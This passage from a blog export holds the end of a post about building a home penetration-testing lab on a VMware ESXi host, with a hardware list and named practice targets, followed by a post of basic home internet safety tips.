laptop/desktop. Depending on the number of “guest” operating systems you wish to install and run at one time, you may encounter resource contention.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><b>4) Build a full virtualization solution.</b></span></span><br /><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">If the previous option does not provide you with the options/flexibility/resources that you need, you can always build a system solely dedicated to running your “guest” operating systems. This option may require the expenditure of additional money in order to build your new virtualization host system.</span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><i><b>Note</b></i>: The above options/approaches are NOT mutually exclusive. You can make use of any/all of them as needed/desired.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">The approach I decided to take was a combination of #1 and #4. I first took inventory of all the systems I had connected to my home network (laptops, desktops, printers, etc…) and then to house/host all of the other “test/target” systems I thought I would/may need, I decided to build a dedicated virtualization host. For this I decided to go with <a href="https://www.vmware.com/products/vsphere-hypervisor/overview.html">VMWare’s ESXi server</a>. The reason I chose ESXi, is that I have had some experience with it in the past, I can easily get the parts to quickly build a decent system, and it is free.</span></span><br /><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;"><br /></span></span><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">Below is my shopping list of parts I bought to build my system:</span></span></div><div style="margin-bottom: 1.5em;"><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($189.99) Seagate Desktop HDD 4 TB SATA 6Gb/s NCQ 64MB Cache 3.5-Inch Internal Bare Drive ST4000DM000</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($78.99) Silverstone Tek Micro-ATX Mini-DTX, Mini-ITX Mini Tower Plastic with Aluminum Accent Computer Cases PS07B (Black)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($17.99) Lite-On Super AllWrite 24X SATA DVD+/-RW Dual Layer Drive - Bulk - IHAS124-04 (Black)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($168.99) SUPERMICRO MBD-X9SCM-F-O LGA 1155 Intel C204 Micro ATX Intel Xeon E3 Server Motherboard</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($279.99) Kingston Technology ValueRAM 32GB Kit (4 x 8GB) 1600MHz DDR3 ECC CL11 DIMM with TS Intel Desktop Memory KVR16E11K4/32I</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($233.99) Intel Xeon Qc E3-1230 Processor</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">($59.99) Corsair Builder Series CX 600 Watt ATX/EPS 80 PLUS (CX600)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">TOTAL COST = $1029.93</span></li></ul><br /><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">All of the parts were purchased from <a href="http://amazon.com/">Amazon.com</a> (mostly because I have an <a href="http://www.amazon.com/gp/prime">Amazon Prime</a> account and thus did not have to pay for shipping).</div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"><br /></div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">As can be seen, the total cost of the system was just over $1000. I may have been able to shave some $$$ off of the cost by reusing some of my old/surplus hardware, but I opted to go with all new equipment.</div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"><br /></div><div><span style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif;"><span style="font-size: 15px; line-height: 24px;">Now that I had my ESXi server built, I need to populate it with various “guest” operating systems. First, I started by installing a couple old Windows XP and Vista licenses I had, but I needed more operating systems than that. Luckily for me, there are lots of free VMs and operating systems available: Debian, Ubuntu, Fedora, Mint, etc… In addition, there are great “target” operating systems available as well:</span></span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Metasploitable 2</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Damn Vulnerable Web Application</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Search on “http://vulnhub.com/” for additional targets.</span></li></ul><br /><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">If I needed additional Windows guests, I could:</span><br /><br /><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Download any available “trials” from the Microsoft website.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Purchase a MSDN Operating System subscription.</span></li></ul><br /><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">I also need “Hacker” boxes to perform all of my scans from. For this I could either build my own </span><br /><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">system, follow one of the many guide on the internet to build a pentest windows/linux machine, or simply download one of the prebuilt systems. Here again, there are LOTS of options to choose from. Personally, I like <a href="http://www.kali.org/downloads/">Kali</a> (the new version of BackTrack).</div></div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"><br /></div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">Well, that is a quick overview of my pentest lab. If you have any comments/questions/suggestions, please feel free to contact and/or leave a comment below.</div></div></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-30580201000442058592013-06-12T14:44:00.000-04:002020-11-17T12:48:48.177-05:00Beware of strangers with candy.<div dir="ltr" style="text-align: left;" trbidi="on"><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"><div style="margin-bottom: 1.5em;">Just as that has always been as good rule to help guide you safely through life, there are also simple rules to help protect you and you home computer while surfing the internet.</div><div style="margin-bottom: 1.5em;">By following a few simple guidelines as well as a few precautions you should be safe from the vast majority of dangerous threats you will encounter on the internet.<span><a name='more'></a></span></div></div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">Precautions: (Safety measures)</div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"></div><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;"></span><br /><ul style="text-align: left;"><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;"><li>Use a host-based firewall. On Windows, the built-in firewall works fine.</li><li>Use a anti-virus detection application. On Windows, the free <a data-mce-href="http://www.microsoft.com/security_essentials/" href="http://www.microsoft.com/security_essentials/" style="-webkit-transition: 0.2s ease-in; color: #fa4e4e; text-decoration: none; transition: all 0.2s ease-in 0s;">Microsoft Security Essentials</a> application works fine.</li><li>Enable automatic download and installation of operating system patches and updates.</li><li>When possible, try to update all of your other programs (firefox, adobe, etc...) to the latest stable versions.</li></span></ul><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;"></span><br /><ul style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px; list-style: square; margin: 0px 0px 1.5em 3em;"></ul><div><div style="margin-bottom: 1.5em;"><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;">Internet Guidelines:</div><ul style="text-align: left;"><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not go to suspicious websites. (i.e. such as URLs from China ".cn" and Russia ".ru". Nothing against the countries themselves, but a lot of malicious activities originate from those internet domains.)</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">If the website says that you need to install special software in order to view the site, do not do it. Unless it is adobe or java, it is a safe bet that it is a malicious program that they want you to install. Even if it is adobe or java, you should go to the products website to download and install the program instead of following a link on the webpage.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Practice safe information handling:</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not post anything to the internet (Facebook, chat, IM, Myspace, Linkedin, blog, etc...) that you do not want to be viewed by everyone. Once something is on the internet, it is there forever and eventually will be viewable by anyone.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not provide your password(s) to anyone. No valid customer support will require you to provide them your password. They already have it.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">For each internet/website account you have (email, Facebook, banking, etc...) use a different password. This makes it much more difficult for someone to get your banking information if they happen to get you Facebook password.</span></li></ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Practice safe email handling. It is best if you...</span></li><ul><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not open (or preview) emails from people you do not know.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not click on any link contained within an email. You must use the link due to something such as an activation code, retype the link into a new web browser window.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not open any document (.pdf, .doc, .xls, etc...) attached to an email. It can be a malicious document that could install dangerous software onto you system.</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not respond to spam or scams. If you receive an offer in an email, and it sounds too good to be true, it probably is!!!</span></li><li><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; font-size: 15px; line-height: 24px;">Do not email personal information (SSNs, credit card numbers, etc...).</span></li></ul></ul></div></div><div style="font-family: Georgia, "Times New Roman", "Bitstream Charter", Times, serif; font-size: 15px; line-height: 24px;"></div></div>Unknownnoreply@blogger.com0